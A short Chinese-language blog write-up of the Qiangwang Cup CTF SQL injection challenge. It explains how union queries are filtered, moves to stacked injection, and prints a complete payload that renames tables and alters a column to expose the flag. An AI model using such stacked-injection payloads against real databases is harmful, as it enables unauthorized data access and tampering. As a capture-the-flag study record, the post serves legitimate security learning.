首页 > 其他分享 >强网杯-随便注

强网杯-随便注

时间:2023-08-18 20:25:22浏览次数:32  
标签:rename tables 1919 查询 随便 强网杯 words

强网杯-随便注

 使用#注释+联合查询的时候出了提示

被过滤的不能用,尝试堆叠注入

 可行,继续下去

 1919这一串很可疑,查内容查不出来,再看看words

像最开始的输出结果,猜这是默认查询的表,要把1919那一大串下面的内容通过默认查询显示出来

1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `flag` `id` varchar(100);#

重命名之后查询成功

 

 

 

标签:rename,tables,1919,查询,随便,强网杯,words
From: https://www.cnblogs.com/guangtouliu/p/17641510.html

相关文章

  • 随便地写
    2023的暑假就这样过去了,虽然没什么印象深刻的事,自己能力也没有得到多大的提升,然而暑假还是结束了。想到暑假前给自己定的那些目标,似乎什么也没有做到,这也是很平常的事了。只是想到去年此时,那个人怀揣着期待进入自己所谓理想的高中,想要在书写光辉而热烈的青春,那种热忱,实在令人怀念......
  • 随便看看
    workbench下载地址https://dev.mysql.com/downloads/workbench/环境虚拟机:16C32Gmysql:percona5.7.19测试CREATETABLE`a`(`account`varchar(50)NOTNULL,KEY`idx_1`(`account`))ENGINE=InnoDBDEFAULTCHARSET=utf8mb4;CREATETABLE`b`(`stu_account`v......
  • 【随便学学】和声学基础
    1.常用基本和弦2.和弦级数3.和声进行......
  • 随便说说学习感想
    发现学习vue得对htmlcssjavascript,typescript 这几门语言的要求还是比较高的,略懂的学起来很陌生,入门的学习起来也很吃力,最少也要熟悉的人学由于本人以前大部分是做后端,所以刚学习起来很费力,这几天都在狠狠补 htmlcssjavascript这些知识,边看边学  目前来看,想直接做项......
  • CTFer成长记录——CTF之Web专题·19强网杯—随便注
    一、题目链接https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8二、解法步骤  本题考察的是堆叠注入:堆叠注入原理就是通过结束符同时执行多条sql语句;例如php中的mysqli_multi_query函数。与之相对应的mysqli_query()只能执行一......
  • 细说强网杯Web辅助
    8/27文章共计1908个词包括三段长代码今天的内容无图,流量不预警和我一起阅读吧1写在前面这里就借由强网杯的一道题目“Web辅助”,来讲讲从构造POP链,字符串逃逸到最后获取flag的过程2题目源码index.php获取我们传入的username和password,并将其序列化储存...if(isset($_GET['username......
  • 【随便写写】小腿抽筋的原因以及如何快速恢复
    原因:人在寒冷时大脑会发出信号让全身骨骼肌阵发性收缩,以产生更多的热量维持体温(这也是为什么寒冷时我们会打寒战的原因)。当肌肉因为其他原因,比如代谢产物聚集、血管痉挛、缺钙等导致细胞兴奋性升高,若再加以寒冷刺激,就很容易发生痉挛。而疲劳正是引起代谢废物聚集的常见原因。肌......
  • [强网杯 2019]随便注
    [强网杯2019]随便注题目来源:buuctf题目类型:web涉及考点:SQL注入、堆叠注入1.先简单介绍一下堆叠注入在SQL语句中,分号用来表示一条语句的结束。那么当我们结束一条语句之后,继续构造下一条语句,可不可以一起执行呢?这就是堆叠注入,简单来说,就是把多条SQL语句一起上传。例如,我们......
  • 第五届“强网杯”全国网络安全挑战赛-线上赛Writeup
    文章目录WEB[强网先锋]赌徒[强网先锋]寻宝MISC签到BlueTeamingISO1995CipherManEzTime问卷题WEB[强网先锋]赌徒目录扫描发现www.zip下载得到源码index.php<metacharset="utf-8"><?php//hintisinhint.phperror_reporting(1);classStart{public$name='guest';......
  • 2020 第四届强网杯 线上赛Misc_Writeup
    目录upload签到问卷调查miscstudyupload下载附件,打开是流量包文件,wireshark打开查看http的包,追踪一下很明显是POST上传的图片File->ExportObject->HTTP...将文件Saveall保存出来,得到如下:%5c有提示steghide隐藏steghide.php用notepad++打开去掉前面这四行,保存修改后缀为jpg或......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99